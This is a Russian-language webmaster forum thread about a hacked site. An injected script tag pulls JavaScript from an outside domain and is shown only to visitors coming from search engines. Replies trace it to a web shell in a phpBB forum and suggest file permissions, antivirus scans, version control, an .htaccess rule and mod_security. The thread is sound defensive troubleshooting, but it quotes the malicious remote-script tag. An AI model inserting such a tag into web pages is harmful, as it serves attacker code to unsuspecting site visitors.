В код сайта вставляется инородный скрипт "Антиспам".

12 3
[Удален]
3140

Здравствуйте. Вчера вечером на почту скинули сообщение о появлении трояна на моем сайте.

Сам скрипт обнаружить не мог, так как скрипт вызывался только для тех, кто переходит на сайт с google или mail. Когда его установили непонятно, но по снижению CTR рекламных баннеров ориентировочно пару дней назад.

Скрипт который вызывается на сайте:

<_script src="http://blogood.ru/Test/1.js_"><_/script>

Вчера скрипт вычистил, поменял все пароли, к FTP, SSH и т.п., в итоге сегодня днем опять появился этот скрипт. Время редактирования файла, в который прописывается этот код - вчерашний день. К тому же в логах FTP ничего нету.

Кто-нибудь с таким встречался? В инете особо ничего нет, только похожая проблема была на каком-то сайте орелинформ...

N
На сайте с 06.05.2007
Offline
419
#1

Скорее всего вам оставили php-шелл, который позволяет менять файлы просто обращаясь к этому скрипту, а не через ftp.

Поставить могли в один момент времени, хоть год назад, а пользоваться начать в другой. Так что нельзя уверенно установить связь между временем модификации файлов и взломом.

Debtor:
Кто-нибудь с таким встречался? В инете особо ничего нет

Каждый хакер стремится выдумать что-нибудь свое в данном вопросе для затруднения очистки. В том, что вы не нашли похожих случаев нет ничего удивительного.

Общих рецептов не так много можно придумать .

Для начала, если у вас vps, попробуйте "стабилизировать" все файлы отдав их в собственность root (chown) и запретив модификацию (chmod). Ужасно некрасиво, но что-то же надо делать.

Иногда помогает пройтись по всем файлам сайта обычным десктопным антивирусом. Они могут находить и веб-шеллы.

Чтобы имитировать заход из google, можно в первых строчках скрипта изменить переменные $_SERVER. Другой информации о посетителе вредоносному коду на php просто неоткуда взять.

Не менее важный вопрос найти каким образом этот веб-шелл возник. Если через ftp - это еще считайте повезло. Просто поменяете пароль. Но если через логическую проблему в коде сайта, то никаких рецептов уже не выписать. Нужно искать эту проблему анализируя действия злоумышленников по логам.

Тут еще местный Андрейка обычно вспоминает про mod_security. При отсутствии других идей и невозможности установить точно каким образом залили шелл, тоже сойдет в качестве защиты. Но в общем случае сайт под mod_security эксплуатировать и разрабатывать неудобно.

Кнопка вызова админа ()
[Удален]
#2

netwind, спасибо за ответ.

На форуме phpBB был найден файл images.php в котором был видимо вредоносный скрипт, который мог изменять файлы на сервере. Скорей всего была проблема в этом. Как теперь латать phpBB и что они могли еще с помощью дырок натворить - непонятно.

P
На сайте с 16.03.2009
Offline
144
#3
Debtor:
netwind, спасибо за ответ.

На форуме phpBB был найден файл images.php в котором был видимо вредоносный скрипт, который мог изменять файлы на сервере. Скорей всего была проблема в этом. Как теперь латать phpBB и что они могли еще с помощью дырок натворить - непонятно.

Гугли уязвимости для версии твоего движка.

В диру аплода закинь htaccess c запретом на открытие .php, html и т.д. файлов:

<Files ~ "^.*\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)">
Order allow,deny
Deny from all
</Files>
M
На сайте с 16.09.2009
Offline
278
#4
Debtor:
Как теперь латать phpBB и что они могли еще с помощью дырок натворить - непонятно.

Установить последнюю стабильную версию?

Что могли натворить и что с этим делать - подробно написали выше.

netwind:
Общих рецептов не так много можно придумать

Для своего кода - лучше всего использовать систему контроля версий. Все каталоги/файлы в ней не содержащиеся - не должны иметь возможность запуска скриптов (т.е. всякие временные директории, каталоги со статикой). Так вы модификации обнаружите сразу.

Да и для стороннего кода, который мало меняется (тот же PHPBB) - эта методика подойдет. Собственно, некоторые дистрибутивы предустанавливают известные движки CMS/форумов на уровне системы в целом. Можно этим пользоваться.

netwind:
Если через ftp - это еще считайте повезло. Просто поменяете пароль.

И зверушка назавтра зальет новые "прелести"? Нет уж. Проверяйте офисный/домашний компьютер на вирусы и меньше по порнушным/варезным сайтам шастайте.

netwind:
Тут еще местный Андрейка обычно вспоминает про mod_security. При отсутствии других идей и невозможности установить точно каким образом залили шелл, тоже сойдет в качестве защиты.

Только если ТС _ясно_ понимает все ньюансы такого способа "защиты" и все его последствия. Если кратко: проще найти шелл чем настроить mod_security так, чтобы он не был постоянной занозой в заднице. Хотя, позднее это время может и окупиться...

Абонементное сопровождение серверов (Debian) Отправить личное сообщение (), написать письмо ().
Andreyka
На сайте с 19.02.2005
Offline
822
#5

У меня просто набор правил которые подходят под 98%

Стандартные конечно будут занозой

Не стоит плодить сущности без необходимости
N
На сайте с 06.05.2007
Offline
419
#6

Andreyka, если вы изменили стандартные правила, то изменился и "уровень защиты". стандартные правила хотя бы специалисты собирали. а вам кто поверит? может ваши правила ничего особо не блокируют ?

Andreyka
На сайте с 19.02.2005
Offline
822
#7

Я тоже специалист и мне верят.

M
На сайте с 01.12.2009
Offline
235
#8
netwind:
Andreyka, если вы изменили стандартные правила, то изменился и "уровень защиты". стандартные правила хотя бы специалисты собирали. а вам кто поверит? может ваши правила ничего особо не блокируют ?

ну хоть не mod_security, уже по другому стал писать Андрюха :)

Администратор Linux,Freebsd. построения крупных проектов.
M
На сайте с 16.09.2009
Offline
278
#9
Andreyka:
У меня просто набор правил которые подходят под 98%

Как вы получили это число?

N
На сайте с 06.05.2007
Offline
419
#10
Andreyka:
Я тоже специалист и мне верят.

Если это был такой аргумент, то он плохонький. Некоторые и Мавроди верят.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий